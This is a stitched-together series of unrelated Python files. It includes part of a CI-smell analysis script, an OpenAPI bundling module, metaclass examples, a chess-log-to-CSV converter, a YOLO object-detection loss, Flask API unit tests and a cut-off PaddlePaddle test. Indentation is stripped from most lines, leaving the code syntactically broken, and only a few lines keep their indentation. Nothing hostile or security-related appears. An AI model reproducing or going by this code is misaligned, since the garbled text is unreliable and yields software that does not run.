tot_versioning = apdf.loc[apdf["Category"] == "Versioning"].shape[0]
tot_allow = apdf.loc[apdf["Category"] == "Job-Allow-Failure"].shape[0]
tot_manual = apdf.loc[apdf["Category"] == "Manual-Job"].shape[0]
tot_retry = apdf.loc[apdf["Category"] == "Job-Retry"].shape[0]
print("\n-> Projects (small yaml)")
apdf_small = apdf.loc[apdf["yml_size"] <= yml_first_quartile]
printOccurrences(apdf_small, tot_smells, tot_smelly_projects, tot_smelly_owners)
printOccurrencesPerCluster2(apdf_small, tot_versioning, tot_allow, tot_retry, tot_manual)
print("\n-> Projects (medium yaml)")
apdf_medium = apdf.loc[(apdf["yml_size"] > yml_first_quartile) & (apdf["yml_size"] < yml_third_quartile)]
printOccurrences(apdf_medium, tot_smells, tot_smelly_projects, tot_smelly_owners)
printOccurrencesPerCluster2(apdf_medium, tot_versioning, tot_allow, tot_retry, tot_manual)
print("\n-> Projects (long yaml)")
apdf_big = apdf.loc[apdf["yml_size"] >= yml_third_quartile]
printOccurrences(apdf_big, tot_smells, tot_smelly_projects, tot_smelly_owners)
printOccurrencesPerCluster2(apdf_big, tot_versioning, tot_allow, tot_retry, tot_manual)
print("\n### YAML-size-based clustering analysis (Big YAML) ###")
# reduce starting dataset to the high sample
big_datasetf = datasetf.loc[datasetf["yml_size"] >= yml_third_quartile]
big_tot_projects = big_datasetf["project"].unique().shape[0]
big_tot_owners = big_datasetf["owner"].unique().shape[0]
print("Analyzable repositories: " + str(big_tot_projects))
# for versioning different candidates
big_versioning_candidates = big_datasetf.loc[(big_datasetf["language"] == "Python") | (big_datasetf["hasPoms"])]
big_tot_projects_versioning = big_versioning_candidates["project"].unique().shape[0]
big_tot_owners_versioning = big_versioning_candidates["owner"].unique().shape[0]
print("Analyzable repositories (Versioning): " + str(big_tot_projects_versioning))
print("Analyzable owners: " + str(big_tot_owners))
print("Analyzable owners (Versioning): " + str(big_tot_owners_versioning))
big_tot_smells = apdf_big['ID'].shape[0]
big_tot_smelly_projects = apdf_big['Project'].unique().shape[0]
big_tot_smelly_owners = apdf_big['Owner'].unique().shape[0]
print("#smells: " + str(big_tot_smells))
print("#smelly-projects: " + str(big_tot_smelly_projects))
print("#smelly-owners: " + str(big_tot_smelly_owners))
printOccurrencesPerCluster(apdf_big, big_tot_smells, big_tot_projects, big_tot_owners, big_tot_projects_versioning,
big_tot_owners_versioning)
print("\n# Analysis of versioning issues")
vapdf = apdf.loc[apdf["Category"] == "Versioning"] # the versioning frame
# tot incidents per file
print("\n-> overall")
versioning_occurrences_byfile(vapdf)
print("\n-> missing")
missing = vapdf.loc[vapdf["Sub-Category"] == "missing"]
versioning_occurrences_byfile(missing)
print("\n-> only-major-number")
only_major_number = vapdf.loc[vapdf["Sub-Category"] == "only-major-number"]
versioning_occurrences_byfile(only_major_number)
print("\n-> any-minor-number")
any_minor_number = vapdf.loc[vapdf["Sub-Category"] == "any-minor-number"]
versioning_occurrences_byfile(any_minor_number)
print("\n-> any-upper-version")
any_upper_version = vapdf.loc[vapdf["Sub-Category"] == "any-upper-version"]
versioning_occurrences_byfile(any_upper_version)
return
def versioning_occurrences_byfile(smell):
tot_incidents = smell.shape[0]
affected_files = smell["Remote Configuration File Link"].unique().shape[0]
yml_incidents = smell.loc[smell["Configuration File Name"] == ".gitlab-ci.yml"]
tot_yml_incidents = yml_incidents.shape[0]
tot_affected_yml = yml_incidents["Remote Configuration File Link"].unique().shape[0]
req_incidents = smell.loc[smell["Configuration File Name"] == "requirements.txt"]
tot_req_incidents = req_incidents.shape[0]
tot_affected_req = req_incidents["Remote Configuration File Link"].unique().shape[0]
pom_incidents = smell.loc[(smell["Configuration File Name"] != ".gitlab-ci.yml") &
(smell["Configuration File Name"] != "requirements.txt")]
tot_pom_incidents = pom_incidents.shape[0]
tot_affected_pom = pom_incidents["Remote Configuration File Link"].unique().shape[0]
print("tot_incidents: " + str(tot_incidents))
print("affected_files: " + str(affected_files))
print("tot_yml_incidents: " + str(tot_yml_incidents) + "(" + str(
round(tot_yml_incidents / tot_incidents * 100, 2)) + "%)")
print("affected_yml_files: " + str(tot_affected_yml))
print("tot_req_incidents: " + str(tot_req_incidents) + "(" + str(
round(tot_req_incidents / tot_incidents * 100, 2)) + "%)")
print("affected_req_files: " + str(tot_affected_req))
print("tot_pom_incidents: " + str(tot_pom_incidents) + "(" + str(
round(tot_pom_incidents / tot_incidents * 100, 2)) + "%)")
print("affected_pom_files: " + str(tot_affected_pom))
if __name__ == '__main__':
print("\nRQ3 results")
dataset_withyml = sys.argv[1] # "dataset_yml-update.csv"
rqthree_smells = sys.argv[2] # "rq3-results-new.csv"
rqthree_results(rqthree_smells, dataset_withyml)
|
from .expander import Expander # noqa
from .bundler import Bundler, create_scanner_factory_from_flavor # noqa
from .separator import Separator # noqa
from .resolver import ( # noqa
get_resolver,
get_resolver_from_filename, # backward compatibility
)
from .example import extract as extract_example # noqa
from .accessor import ( # noqa
access_by_json_pointer,
assign_by_json_pointer,
path_to_json_pointer,
json_pointer_to_path,
)
from ..langhelpers import make_dict, pairrsplit
import os.path
def expand(filename, *, onload=None, doc=None, format=None):
resolver = get_resolver(filename, doc=doc, onload=onload, format=format)
expander = Expander(resolver)
return expander.expand()
def bundle(
filename, *, onload=None, doc=None, format=None, extras=None, flavor="openapiv2"
):
jsonref = ""
if filename:
filename, jsonref = pairrsplit(filename, "#/")
if jsonref:
doc = make_dict()
cwd = os.getcwd()
ref = "{prefix}#/{jsonref}".format(
prefix=os.path.relpath(filename, start=cwd), jsonref=jsonref
)
assign_by_json_pointer(doc, jsonref, {"$ref": ref})
filename = os.path.join(
cwd, "*root*{name}#/".format(name=os.path.splitext(filename)[1])
)
# adding multi files
if extras is not None:
for efilename in extras:
efilename, ejsonref = pairrsplit(efilename, "#/")
if not ejsonref:
                raise ValueError(
                    "{efilename!r} is not a json reference. "
                    "(please <filename>#/<reference>)".format(efilename=efilename)
                )
eref = "{prefix}#/{ejsonref}".format(
prefix=os.path.relpath(efilename, start=cwd), ejsonref=ejsonref
)
assign_by_json_pointer(doc, ejsonref, {"$ref": eref})
resolver = get_resolver(filename, doc=doc, onload=onload, format=format)
bundler = Bundler(
resolver, scanner_factory=create_scanner_factory_from_flavor(flavor)
)
r = bundler.bundle(resolver.doc)
return r
def separate(src: str, *, dst: str = None, input_format=None, output_format=None):
resolver = get_resolver(src, format=input_format)
separator = Separator(resolver, format=output_format, here=dst or None)
separator.separate(name="main", dst=dst)
|
from pyacc.common import DFAState, DFA
class LALRDFAState(DFAState):
count = 0
class LALRDFA(DFA):
StateClass = LALRDFAState
def minimize(self):
pass
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: Controlling instance creation with metaclasses
Desc :
"""
class NoInstances(type):
def __call__(self, *args, **kwargs):
raise TypeError("Can't instantiate directly")
# Example
class Spam(metaclass=NoInstances):
@staticmethod
def grok(x):
print('Spam.grok')
class Singleton(type):
def __init__(self, *args, **kwargs):
self.__instance = None
super().__init__(*args, **kwargs)
def __call__(self, *args, **kwargs):
if self.__instance is None:
self.__instance = super().__call__(*args, **kwargs)
return self.__instance
else:
return self.__instance
# Example
class Spam1(metaclass=Singleton):
def __init__(self):
print('Creating Spam')
import weakref
class Cached(type):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__cache = weakref.WeakValueDictionary()
def __call__(self, *args):
if args in self.__cache:
return self.__cache[args]
else:
obj = super().__call__(*args)
self.__cache[args] = obj
return obj
# Example
class Spam2(metaclass=Cached):
def __init__(self, name):
print('Creating Spam({!r})'.format(name))
self.name = name
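if __name__ == '__main__':
    # Quick demonstration of the three metaclasses defined above.
    try:
        Spam()                    # NoInstances forbids direct instantiation
    except TypeError as exc:
        print(exc)
    Spam.grok(42)                 # static methods remain usable
    a, b = Spam1(), Spam1()
    print(a is b)                 # Singleton: True, only one instance is ever created
    x, y, z = Spam2('Guido'), Spam2('Diana'), Spam2('Guido')
    print(x is z, x is y)         # Cached: True False (same args reuse the cached object)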
|
import re
import csv
#with open('My_Games', 'r') as in_file:
# stripped = (line.strip() for line in in_file)
# lines = (line.split("\n\n") for line in stripped if line)
# with open('my_games.csv', 'w') as out_file:
# writer = csv.writer(out_file)
# writer.writerow(('Event', 'Date', 'White', 'Black', 'Result', 'WhiteElo', 'BlackElo', 'Variant', 'TimeControl', 'First Move', 'Second Move'))
# writer.writerow(lines)
with open('My_Games', 'r') as input_file:
my_games=[line.rstrip('\n') for line in input_file]
#reader=csv.reader(input_file, delimiter='\n')
with open('my_games.csv', 'w') as output_file:
writer = csv.writer(output_file)
writer.writerow(('Event', 'Date', 'White', 'Black', 'Result', 'WhiteElo', 'BlackElo', 'Variant', 'TimeControl', 'First Move', 'Second Move'))
for row in my_games:
writer.writerow(row)
|
import numpy as np
import torch
class YoloLoss(torch.nn.Module):
def __init__(self):
super(YoloLoss, self).__init__()
def forward(self, outputs, samp_bndbxs, y_true, anchors, scalez, cell_grid, ep, no_obj_thresh):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def reshape_ypred(outputz):
# reshape outputs to separate anchor boxes
outputz = outputz.unsqueeze(4)
outputz = torch.chunk(outputz, 5, dim=3)
outputz = torch.cat(outputz, dim=4)
outputz = outputz.transpose(3, 4)
return outputz
def split_preds(outputz):
# split to get individual outputs
xypred = torch.sigmoid(outputz[..., 0:2])
whpred = outputz[..., 2:4]
cfpred = torch.sigmoid(outputz[..., 4])
clpred = torch.sigmoid(outputz[..., 5:])
clpred = clpred.squeeze()
return xypred, whpred, cfpred, clpred
def split_preds_multi(outputz):
# split to get individual outputs
xypred = torch.sigmoid(outputz[..., 0:2])
whpred = outputz[..., 2:4]
cfpred = torch.sigmoid(outputz[..., 4])
# clpred = torch.sigmoid(outputz[..., 5:])
clpred = torch.nn.functional.softmax(outputz[..., 5:], dim=4)
# clpred = clpred.squeeze()
return xypred, whpred, cfpred, clpred
def create_bndbx_masks(sampbndbxs):
# get mask of which areas are zero
wh_gt = sampbndbxs[:, :, 2]
wh_gt[wh_gt == float('inf')] = 0
bndbxsmask = torch.gt(wh_gt, 0.0001)
bndbxsmask4 = bndbxsmask.unsqueeze(2)
bndbxsmask2 = bndbxsmask.unsqueeze(1)
bndbxsmask2 = bndbxsmask2.unsqueeze(1)
bndbxsmask2 = bndbxsmask2.unsqueeze(1)
return bndbxsmask, bndbxsmask2, bndbxsmask4
# Convert truth for noones.
def get_true_wi(sampbndbxs, bndbxsmask4):
truexywi = sampbndbxs[..., 1:3]
truewhwi = sampbndbxs[..., 3:5]
zerosreplace = torch.zeros(truexywi.size())
zerosreplace = zerosreplace.to(device)
truexywi = torch.where(bndbxsmask4, truexywi, zerosreplace)
truewhwi = torch.where(bndbxsmask4, truewhwi, zerosreplace)
truexywi = truexywi.unsqueeze(1)
truexywi = truexywi.unsqueeze(1)
truexywi = truexywi.unsqueeze(1)
truewhwi = truewhwi.unsqueeze(1)
truewhwi = truewhwi.unsqueeze(1)
truewhwi = truewhwi.unsqueeze(1)
return truexywi, truewhwi
def get_noones_mask(predxywi, predwhwi, truexywi, truewhwi, bndbxsmask, noobjthresh):
truewhhalf2 = torch.div(truewhwi, 2.0)
truemins2 = truexywi - truewhhalf2
truemaxes2 = torch.add(truexywi, truewhhalf2)
bndbxsmask2 = bndbxsmask.unsqueeze(5)
zerosreplace = torch.zeros(truemins2.size())
zerosreplace = zerosreplace.to(device)
truemins2 = torch.where(bndbxsmask2, truemins2, zerosreplace)
truemaxes2 = torch.where(bndbxsmask2, truemaxes2, zerosreplace)
predxywi = predxywi.unsqueeze(4)
predwhwi = predwhwi.unsqueeze(4)
predwhhalf2 = torch.div(predwhwi, 2.)
predmins2 = predxywi - predwhhalf2
predmaxes2 = torch.add(predxywi, predwhhalf2)
intersectmins2 = torch.max(predmins2, truemins2)
intersectmaxes2 = torch.min(predmaxes2, truemaxes2)
intersectwh2 = intersectmaxes2 - intersectmins2
zerosreplace2 = torch.zeros(intersectwh2.size())
zerosreplace2 = zerosreplace2.to(device)
intersectwh2 = torch.max(intersectwh2, zerosreplace2)
intersectareas2 = torch.mul(intersectwh2[..., 0], intersectwh2[..., 1])
trueareas2 = torch.mul(truewhwi[..., 0], truewhwi[..., 1])
predareas2 = torch.mul(predwhwi[..., 0], predwhwi[..., 1])
unionareas2 = torch.add((torch.add(predareas2, trueareas2) - intersectareas2), 0.00001)
iouscoresall = torch.div(intersectareas2, unionareas2)
zerosreplace3 = torch.zeros(iouscoresall.size())
zerosreplace3 = zerosreplace3.to(device)
iouscoresall = torch.where(bndbxsmask, iouscoresall, zerosreplace3)
bestious = torch.max(iouscoresall, dim=4)
bestious = bestious.values
# print("best iou", round(torch.max(bestious).item(), 2))
# create masks ones and no ones
noones = torch.lt(bestious, noobjthresh)
return noones
def warm_select(epin, warmmat, truemat):
ep_chk = torch.zeros(truemat.size())
ep_chk = ep_chk.fill_(epin)
ep_chk = torch.lt(ep_chk, 200.0)
ep_chk = ep_chk.to(device)
truemat = torch.where(ep_chk, warmmat, truemat)
return truemat
def process_ytrue_mat(ytrue, cellgrid, gridtrch, anchorz, epin):
# get x and y relative to box
truexy = ytrue[..., 0:2]
# adjust to relative to whole image
truexywi = torch.div(torch.add(truexy, cellgrid), gridtrch)
warmxy = torch.empty(truexy.size()).to(device)
warmxy = warmxy.fill_(0.5)
warmxywi = torch.div(torch.add(warmxy, cellgrid), gridtrch)
#truexy = warm_select(epin, warmxy, truexy)
#truexywi = warm_select(epin, warmxywi, truexywi)
# get w and h
truewhwi = ytrue[..., 2:4]
# adjust w and h
truewh = torch.div(torch.mul(truewhwi, gridtrch), anchorz)
truewh_mask = torch.gt(truewh, 0.000001).type(torch.FloatTensor).to(device)
truewh = torch.log(torch.add(truewh, 0.000001))
truewh = torch.mul(truewh, truewh_mask)
warmwh = torch.zeros(truewh.size()).to(device)
warmwhwi = torch.ones(truewhwi.size()).to(device)
warmwhwi = torch.div(torch.mul(warmwhwi, anchorz), gridtrch)
#truewh = warm_select(epin, warmwh, truewh)
#truewhwi = warm_select(epin, warmwhwi, truewhwi)
return truexy, truewh, truexywi, truewhwi
def get_iou_mat(truexywimat, truewhwimat, predxywi, predwhwi):
# adjust confidence
truewhhalf = torch.div(truewhwimat, 2.)
zeros_replace = torch.zeros(truexywimat.size()).to(device)
truemins = truexywimat - truewhhalf
# truemins = torch.max(truemins, zeros_replace)
ones_replace = torch.ones(truexywimat.size()).to(device)
truemaxes = torch.add(truexywimat, truewhhalf)
# truemaxes = torch.min(truemaxes, ones_replace)
trueareas = truemaxes - truemins
trueareas = torch.mul(trueareas[..., 0], trueareas[..., 1])
predwhhalf = torch.div(predwhwi, 2.)
predmins = predxywi - predwhhalf
# predmins = torch.max(predmins, zeros_replace)
predmaxes = torch.add(predxywi, predwhhalf)
predmaxes = torch.min(predmaxes, ones_replace)
intersectmins = torch.max(predmins, truemins)
intersectmaxes = torch.min(predmaxes, truemaxes)
zeros_replace2 = torch.zeros(intersectmaxes.size())
zeros_replace2 = zeros_replace2.to(device)
intersectwh = torch.max((intersectmaxes - intersectmins), zeros_replace2)
intersectareas = torch.mul(intersectwh[..., 0], intersectwh[..., 1])
predareas = predmaxes - predmins
predareas = torch.mul(predareas[..., 0], predareas[..., 1])
            # add a small amount to avoid divide by zero; the result is later multiplied by zero anyway
            unionareas = torch.add((torch.add(predareas, trueareas) - intersectareas), 0.00001)
            iouscores = torch.div(intersectareas, unionareas)
return iouscores
obj_scale = scalez[0]
no_obj_scale = scalez[1]
class_scale = scalez[2]
coord_scale = scalez[3]
# Reshape predictions
y_pred = reshape_ypred(outputs)
# Define basic values
batchsz, gridh, gridw, ankz, finsiz = y_pred.size()
grid_trch = torch.from_numpy(np.array([gridw, gridh])).type(torch.FloatTensor)
grid_trch = grid_trch.to(device)
anchors1 = anchors.unsqueeze(0)
anchors1 = anchors1.unsqueeze(0)
anchors1 = anchors1.unsqueeze(0)
bndbxs_mask, bndbxs_mask2, bndbxs_mask4 = create_bndbx_masks(samp_bndbxs)
# Process Predictions
xy_pred, wh_pred, cf_pred, cl_pred = split_preds_multi(y_pred)
# mask = torch.ge(cf_pred, 0.5).type(torch.FloatTensor)
# mask = mask.unsqueeze(4).to(device)
# print("xy", round(torch.max(xy_pred).item(), 2), round(torch.min(xy_pred).item(), 2),
# "wh", round(torch.max(wh_pred).item(), 2), round(torch.min(wh_pred).item(), 2),
# "cf", round(torch.max(cf_pred).item(), 2), round(torch.min(cf_pred).item(), 2),
# "cl", round(torch.max(cl_pred).item(), 2), round(torch.min(cl_pred).item(), 2))
# Get predictions on whole image
pred_xy_wi = torch.div(torch.add(xy_pred, cell_grid), grid_trch)
pred_wh_wi = torch.div(torch.mul(torch.exp(wh_pred), anchors1), grid_trch)
# get whole image truths and no ones matrix from list of bound boxes
true_xy_wi_list, true_wh_wi_list = get_true_wi(samp_bndbxs, bndbxs_mask4)
no_ones = get_noones_mask(pred_xy_wi, pred_wh_wi, true_xy_wi_list, true_wh_wi_list, bndbxs_mask2, no_obj_thresh)
# get true values and whole image values from true matrix
true_xy, true_wh, true_xy_wi_mat, true_wh_wi_mat = process_ytrue_mat(y_true, cell_grid, grid_trch, anchors1, ep)
# print("true_xy", round(torch.max(true_xy).item(), 2), round(torch.min(true_xy).item(), 2),
# "true_wh", round(torch.max(true_wh).item(), 2), round(torch.min(true_wh).item(), 2),
# "true_xy_wi_mat", round(torch.max(true_xy_wi_mat).item(), 2),
# "true_wh_wi_mat", round(torch.max(true_wh_wi_mat).item(), 2))
iou_scores = get_iou_mat(true_xy_wi_mat, true_wh_wi_mat, pred_xy_wi, pred_wh_wi)
# print("iou score", round(torch.max(iou_scores).item(), 2))
ones = y_true[..., 4]
# warm_ones = torch.zeros(ones.size()).to(device)
warm_ones = torch.mul(ones, 0.01)
#ones = warm_select(ep, warm_ones, ones)
# print("xywi", round(torch.max(pred_xy_wi).item(), 2), round(torch.min(pred_xy_wi).item(), 2),
# "whwi", round(torch.max(pred_wh_wi).item(), 2), round(torch.min(pred_wh_wi).item(), 2))
loss_conf = iou_scores - cf_pred
loss_conf = torch.pow(loss_conf, 2)
loss_conf = torch.mul(loss_conf, ones)
loss_conf = torch.mul(loss_conf, obj_scale)
loss_conf = torch.sum(loss_conf)
zeros_replace6 = torch.zeros(cf_pred.size())
zeros_replace6 = zeros_replace6.to(device)
loss_noconf = zeros_replace6 - cf_pred
loss_noconf = torch.pow(loss_noconf, 2)
no_ones = no_ones.type(torch.FloatTensor)
no_ones = no_ones.to(device)
# warm_noones = torch.zeros(no_ones.size()).type(torch.FloatTensor)
# warm_noones = warm_noones.to(device)
# warm_noones = torch.mul(no_ones, 0.01)
# no_ones = warm_select(ep, warm_noones, no_ones)
loss_noconf = torch.mul(loss_noconf, no_ones)
loss_noconf = torch.mul(loss_noconf, no_obj_scale)
loss_noconf = torch.sum(loss_noconf)
ones = ones.unsqueeze(4)
ones_replace = torch.ones(cl_pred.size())
ones_replace = ones_replace.to(device)
class_true = y_true[..., 5:]
class_true = class_true.to(device)
loss_class = class_true - cl_pred
loss_class = torch.pow(loss_class, 2)
loss_class = torch.mul(loss_class, ones)
loss_class = torch.mul(loss_class, class_scale)
loss_class = torch.sum(loss_class)
#warm_ones = warm_ones.fill_(0.01)
#ones = warm_select(ep, warm_ones, ones)
loss_xy = torch.pow((true_xy - xy_pred), 2)
loss_xy = torch.mul(loss_xy, ones)
loss_xy = torch.mul(loss_xy, coord_scale)
loss_xy = torch.sum(loss_xy)
        loss_wh = torch.pow((true_wh - wh_pred), 2)
        loss_wh = torch.mul(loss_wh, ones)
        # weight the size term by coord_scale, mirroring the centre (xy) term above
        loss_wh = torch.mul(loss_wh, coord_scale)
        loss_wh = torch.sum(loss_wh)
# outz = [loss_conf, loss_noconf, loss_class, loss_wh, loss_xy]
loss = loss_conf + loss_noconf + loss_wh + loss_xy + loss_class
# print("total loss", round(loss.item(), 2),
# "conf", round(loss_conf.item(), 2),
# "noconf", round(loss_noconf.item(), 2),
# "class", round(loss_class.item(), 2),
# "size", round(loss_wh.item(), 2),
# "centre", round(loss_xy.item(), 2))
return loss
"""
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
outputs = torch.randn(4, 10, 20, 30)
outputs = outputs.to(device)
bndbxs = np.array([0, 0.35, 0.3, 0.2, 0.25])
bndbxs_pad = np.empty((13,5))
bndbxs = np.vstack((bndbxs, bndbxs_pad))
bndbxs = np.expand_dims(bndbxs, 0)
bndbxs = np.vstack((bndbxs, bndbxs, bndbxs, bndbxs))
bndbxs = torch.from_numpy(bndbxs).type(torch.FloatTensor)
bndbxs = bndbxs.to(device)
y_true = torch.zeros(4, 10, 20, 5, 6)
y_true[0, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true[1, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true[2, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true[3, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true = y_true.to(device)
anchors_in = [[2.387088, 2.985595], [1.540179, 1.654902], [3.961755, 3.936809], [2.681468, 1.803889],
[5.319540, 6.116692]]
anchors_in = torch.from_numpy(np.array(anchors_in)).type(torch.FloatTensor)
anchors_in = anchors_in.to(device)
scalez = [1, 0.5, 1, 1]
batchsz, gridh, gridw, longout = outputs.size()
cell_x = np.reshape(np.tile(np.arange(gridw), gridh), (1, gridh, gridw, 1))
cell_y = np.reshape(np.repeat(np.arange(gridh), gridw), (1, gridh, gridw, 1))
# combine to give grid
cell_grid = np.tile(np.stack([cell_x, cell_y], -1), [1, 1, 1, 5, 1])
cell_grid = torch.from_numpy(cell_grid).type(torch.FloatTensor)
cell_grid = cell_grid.to(device)
criterion = YoloLoss()
# forward expects (outputs, samp_bndbxs, y_true, anchors, scalez, cell_grid, ep, no_obj_thresh)
loss = criterion(outputs, bndbxs, y_true, anchors_in, scalez, cell_grid, 0, 0.3)
print(loss)
# x = torch.zeros(10)
# y = 1/x # tensor with all infinities
# print(y)
# y[y == float('inf')] = 0
# print(y)
"""
|
import unittest
from unittest import mock
from airfield.util import dependency_injection as di
from airfield.adapter.marathon import MarathonAdapter, InstanceState
from airfield.adapter.kv import KVAdapter
from airfield.util import logging
from tests.mocks.marathon_adapter import MarathonAdapterMock
from tests.mocks.kv import InMemoryKVAdapter
import json
class InstanceApiTest(unittest.TestCase):
def setUp(self):
logging.silence()
di.test_setup_clear_registry()
self.marathon_adapter_mock = MarathonAdapterMock()
self.kv_mock = InMemoryKVAdapter()
di.register(MarathonAdapter, self.marathon_adapter_mock)
di.register(KVAdapter, self.kv_mock)
from airfield.app import create_app
self.app = create_app()
self.app.testing = True
self.client = self.app.test_client()
def tearDown(self):
di.test_setup_clear_registry()
def test_get_prices(self):
result = self.client.get("/api/instance_prices")
data = result.get_json()
self.assertEqual(data, {
'cost_tracking_enabled': False,
'cost_currency': 'EURO',
'cost_core_per_minute': 0.0,
'cost_gb_per_minute': 0.0
})
def test_calculate_costs(self):
json_string = json.dumps({
'spark': {
'cores_max': 4,
'executor_cores': 1,
'executor_memory': 1024
},
'notebook': {
'cores': 4,
'memory': 1024
}
})
result = self.client.get(f"/api/instance_costs?configuration={json_string}")
data = result.get_json()
self.assertEqual(data, {'costs_per_hour': 0.0})
def test_get_instances(self):
response = self.client.get("/api/instance")
data = response.get_json()
self.assertEqual(data, dict(instances=[]))
def test_create_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict(comment="foobar", delete_at="2000-01-01", notebook=dict(cores=4)))
response = self.client.post("/api/instance", json=configuration)
data = response.get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
app_definition = self.marathon_adapter_mock.value_deploy_instance()
self.assertEqual(app_definition["cpus"], 4)
response = self.client.get("/api/instance")
data = response.get_json()["instances"]
self.assertTrue(len(data) == 1)
instance = data[0]
self.assertEqual(instance_id, instance["instance_id"])
self.assertEqual("foobar", instance["details"]["comment"])
self.assertEqual("2000-01-01T00:00:00", instance["details"]["delete_at"])
def test_get_instance_credentials(self):
configuration = dict(
configuration=dict(usermanagement=dict(enabled=True, users=dict(admin="notsecure", random=None))))
response = self.client.post("/api/instance", json=configuration)
data = response.get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
response = self.client.get("/api/instance/{}/credentials".format(instance_id))
credentials = response.get_json()
self.assertTrue("admin" in credentials)
self.assertEqual("notsecure", credentials["admin"])
self.assertTrue("random" in credentials)
self.assertIsNotNone(credentials["random"])
def test_delete_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.NOT_FOUND)
configuration = dict(configuration=dict())
response = self.client.post("/api/instance", json=configuration)
data = response.get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
response = self.client.delete("/api/instance/{}".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(self.client.get("/api/instance").get_json()["instances"], [])
data = self.client.get("/api/instance?deleted=true").get_json()["instances"]
self.assertTrue(len(data) == 1)
instance = data[0]
self.assertEqual(instance_id, instance["instance_id"])
self.assertTrue("deleted_at" in instance["details"])
def test_update_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict(admin=dict(group="test")))
data = self.client.post("/api/instance", json=configuration).get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
configuration["configuration"]["comment"] = "foobar"
configuration["configuration"]["notebook"] = dict(cores=4)
configuration["configuration"]["admin"] = dict(group="foobar")
response = self.client.put("/api/instance/{}".format(instance_id), json=configuration)
self.assertEqual(response.status_code, 200)
response = self.client.get("/api/instance/{}/configuration".format(instance_id)).get_json()
self.assertEqual(response["comment"], "foobar")
self.assertEqual(response["notebook"]["cores"], 4)
self.assertEqual(response["admin"]["group"], "test")
app_definition = self.marathon_adapter_mock.value_deploy_instance()
self.assertEqual(app_definition["cpus"], 4)
def test_restart_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict())
instance_id = self.client.post("/api/instance", json=configuration).get_json()["instance_id"]
response = self.client.post("/api/instance/{}/restart".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "restarted")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_restart_instance())
self.marathon_adapter_mock.value_get_instance_status(InstanceState.STOPPED)
response = self.client.post("/api/instance/{}/restart".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "started")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_start_instance())
def test_stop_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict())
instance_id = self.client.post("/api/instance", json=configuration).get_json()["instance_id"]
response = self.client.post("/api/instance/{}/stop".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "stopped")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_stop_instance())
self.marathon_adapter_mock.value_get_instance_status(InstanceState.STOPPED)
response = self.client.post("/api/instance/{}/stop".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "")
def test_start_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict())
instance_id = self.client.post("/api/instance", json=configuration).get_json()["instance_id"]
response = self.client.post("/api/instance/{}/start".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "")
self.marathon_adapter_mock.value_get_instance_status(InstanceState.STOPPED)
response = self.client.post("/api/instance/{}/start".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "started")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_start_instance())
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import paddle
from test_dist_base import runtime_main, TestParallelDyGraphRunnerBase
from paddle.nn import Layer, Embedding
paddle.set_default_dtype("float64")
class SimpleNet(Layer):
def __init__(self,
hidden_size,
vocab_size,
num_steps=20,
init_scale=0.1,
is_sparse=False,
dtype="float64"):
super(SimpleNet, self).__init__()
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.init_scale = init_scale
self.num_steps = num_steps
self.embedding = Embedding(
self.vocab_size,
self.hidden_size,
            sparse=is_sparse,
weight_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Uniform(low=-init_scale,
high=init_scale)))
self.softmax_weight = self.create_parameter(
attr=paddle.ParamAttr(),
shape=[self.hidden_size, self.vocab_size],
dtype=dtype,
default_initializer=paddle.nn.initializer.Uniform(
low=-self.init_scale, high=self.init_scale))
self.softmax_bias = self.create_parameter(
attr=paddle.ParamAttr(),
shape=[self.vocab_size],
dtype=dtype,
default_initializer=paddle.nn.initializer.Uniform(
low=-self.init_scale, high=self.init_scale))
self.tmp = self.create_parameter(
attr=paddle.ParamAttr(),
shape=[self.hidden_size, self.vocab_size],
dtype=dtype,
default_initializer=paddle.nn.initializer.Uniform(
